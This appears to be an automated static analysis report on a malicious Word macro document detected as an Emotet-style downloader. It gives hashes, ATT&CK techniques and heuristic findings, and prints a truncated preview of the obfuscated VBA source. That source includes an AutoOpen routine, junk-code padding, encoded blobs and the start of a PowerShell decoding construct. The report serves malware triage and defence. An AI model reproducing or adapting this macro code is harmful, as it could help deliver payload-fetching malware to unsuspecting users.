Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9e6347d840acc5ef…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 165.5 KB
Created: 2018-04-12 08:30:00
Authoring application: Microsoft Office Word
First seen: 2019-01-20
MD5: d0e02f082be06ec80ea148a87c26298b
SHA-1: 70e9be169aef065f54299cc3dec9b6fb64a2e44f
SHA-256: 9e6347d840acc5ef86f644b33e93a0ab84d21cfd41d01da1add0c81c8bae9bcf
Risk Score: 204

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros, including an AutoOpen macro, a common auto-execution technique in malicious documents. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, suggesting an attempt to execute arbitrary commands. The extracted 'macros.bas' artifact confirms the macro-based nature of the threat. The heavily obfuscated script, combined with the Shell() call, strongly implies that it is designed to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 145645 bytes
SHA-256: cbcb4be36dbbb8b160fc863f1622d8de477dcf0020034c69fb8b3d9731f1f70f
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 34 long base64-like blob(s))
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "APVizGouWKrjX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
ZrWQE = CByte(XKhEN)
LrRim = AmwFio
pqunD = Cos(2693 - Oct(77784 + wODzu * OAZmOI - CBool(TEaiZ)))
Application.Run tJLUI + "jXPwwWIQJ" + CPbcXd, YMMcO + TZzzjzHSvu + rMllXT
fDVlU = CByte(ijusm)
uRrWnY = ILkwG
MDhHHY = Cos(77872 - Oct(1975 + CztpIT * VdUaiT - CBool(AqwNV)))
End Sub

Attribute VB_Name = "IvEPKHAz"
Sub nUztH(scwQi)
pGift = CByte(phRJLS)
fGuiiA = Cwqzd
MzHNAw = Cos(75134 - Oct(3962 + pakRN * QHdJi - CBool(bHwwT)))
End Sub
Function TZzzjzHSvu()
On Error Resume Next
jJbZOz = CByte(Zrjuc)
JKiYW = TOTLqP
dFTwEm = Cos(28073 - Oct(4551 + YdjQMr * SGLDv - CBool(hlzbC)))
OawhQizu = VJpSA("uu.uwE2ADEANAA4ADEAYgA0AGUAMwA4ADMANAA5AGYAOQAwADYAZgA1ADQAMAAxADUAMwAyAGYAOAA2ADYAYwBlADIAOQA4ADjKo", 7 + iuZBlf - iuZBlf, 91 + iuZBlf - iuZBlf)
kMzlJS = CByte(JGsbI)
HOlFp = hcpBF
MAYXiA = Cos(57497 - Oct(68904 + ShasZw * hSZiDq - CBool(qwjIVU)))
tjhzm = CByte(EAchk)
hrVaf = IrEomE
pYkUpr = Cos(40275 - Oct(77928 + vaGSXL * nwLPE - CBool(BZjiX)))
qopGlKTAz = VJpSA("2NqNgA1AGUANwA1ADUAZAAyAGEANwAxADYAZQAwADUAYQA4AGUbmT", 4 + uLsGzR - uLsGzR, 47 + uLsGzR - uLsGzR)
qvEwdE = CByte(sUjmpP)
iwvTNc = URsbpq
WLnHUo = Cos(96511 - Oct(6972 + idOZTC * JVzVi - CBool(dNVuj)))
FQkzS = CByte(COhwY)
zurGj = TukEBb
VEWYtZ = Cos(62357 - Oct(42505 + JhJYlG * fOZkz - CBool(NJrRoE)))
cbSnYd = VJpSA("LWNgA2AGYAMwAwAGYAMQA1AGUAOQA2ADEAYwAyADkAMwBkAGIAZAA3AGMAZQAzADQAMAA5AGMANwA2AGEAYQAwAGUAZAA5AD6zW8", 3 + iMUnO - iMUnO, 94 + iMUnO - iMUnO)
UAPIF = CByte(QfqoYs)
ZlJzIG = dEqbr
rqNjbl = Cos(53667 - Oct(36864 + IRASo * koZArP - CBool(czuJh)))
jBPHo = CByte(oQNqFR)
cQDQG = dvbIU
klfLHO = Cos(78972 - Oct(96995 + wQvvkv * PJlZwv - CBool(TEJil)))
ZPGrzC = VJpSA("zLi7u0ADQAYwA2AGYAMgAzADQANgA0ADMAOAA4ADIANABkAGEANQAwADUAYgA1ADQAYwBlAqh", 7 + ZPKnRK - ZPKnRK, 65 + ZPKnRK - ZPKnRK)
bFtvOD = CByte(IFGcQ)
YdzIU = XhjRW
vpjMGz = Cos(68774 - Oct(6924 + RtXAj * hnJDJJ - CBool(WbUwoI)))
tCMzXJ = CByte(Rzzjs)
MVWmWw = ZcfNRi
uhGMG = Cos(23232 - Oct(48858 + uQERo * Fvmwi - CBool(OCTQo)))
tRwRPQIq = VJpSA("whADcLYZKIbr", 3 + DvnWA - DvnWA, 3 + DvnWA - DvnWA)
zPQWw = CByte(slOjtk)
fLEbGi = IrUht
iGJsN = Cos(82195 - Oct(46269 + OJrYRW * DtVCB - CBool(CMJaN)))
dCPujD = CByte(amlMwQ)
JzCvA = iGQKb
qQVfJ = Cos(61545 - Oct(65042 + biWZHX * uGmIL - CBool(DzFnw)))
IjbEPiotzU = VJpSA("iSQiQAOAA5ADMANQBlADYAMwA2AGYAYwA5ADEANwBmAGYAYQBmAGIAZQA1ADMAZABhADcANAAzAGIAYgBmADkAYwAwADMAZABhAGIAOQAwAGQAMWT", 5 + jOGvjc - jOGvjc, 107 + jOGvjc - jOGvjc)
JUWlFT = CByte(NdEGc)
QSbabd = cFjAiB
AmSPs = Cos(21736 - Oct(6255 + iEzQF * KipzKb - CBool(EcWiKK)))
PabSfF = CByte(SvjVm)
MCiSQ = IzEdX
WQFURG = Cos(98612 - Oct(66520 + FMCQlK * lkjEl - CBool(clQDuO)))
wwQJni = VJpSA("YobAGIANABkAGEANgBjAGMAWS.v", 4 + EkWHE - EkWHE, 20 + EkWHE - EkWHE)
vLzDpJ = CByte(zzidWE)
HqfBi = vMTwS
doTENL = Cos(70698 - Oct(85119 + uOwbc * QnGCi - CBool(oVvkBP)))
mqBKE = CByte(kiPjJ)
GMtGm = TkOsGG
FifIwX = Cos(59551 - Oct(12654 + OvpXAJ * nqiXk - CBool(HCwhL)))
VkiCc = VJpSA("@wBlADMAMAA5AGEANwA5AGEAZQA1AGYAMgA1ADkAMgA1ADAANQBkADMAMAA2ADYANgBhAGYAOIuT@7bt", 2 + vjrAk - vjrAk, 72 + vjrAk - vjrAk)
nuuku = CByte(zhEaS)
iSJwz = PjKPb
YiNzb = Cos(56171 - Oct(19162 + LTTDT * uKBbQ - CBool(XYtSw)))
sdNIRM = CByte(GcGoF)
jiwVj = mLJwh
JLIoPX = Cos(51372 - Oct(60400 + VXFRm * nPauz - CBool(TYnvio)))
OViviM = VJpSA("6%3BzAGUAYgA0AGMAZAA5AGMAMQBjADEANgA0AGEANQBmAGYANABlAGYANgA4ADIAZAA1AGEANQ0b", 5 + EjSfB - EjSfB, 71 + EjSfB - EjSfB)
AcjifV = CByte(AQSMj)
awOGs = uMzwi
iqqnU = Cos(86167 - Oct(64698 + lfslsZ * iAWzOL - CBool(WVKhDi)))
FvTFhJ = CByte(HiEkbG)
DSoHz = KWqYtj
sVHvzM = Cos(33935 - Oct(84811 + oiuDbJ * nLOjp - CBool(jldlz)))
chjzjTEi = VJpSA("KH([RuntIme.iNTeroPsErVICES.mARshAL]::PtRToStRinGUNi([RUNtimE.INTEroPSeRVICeS.
... (truncated)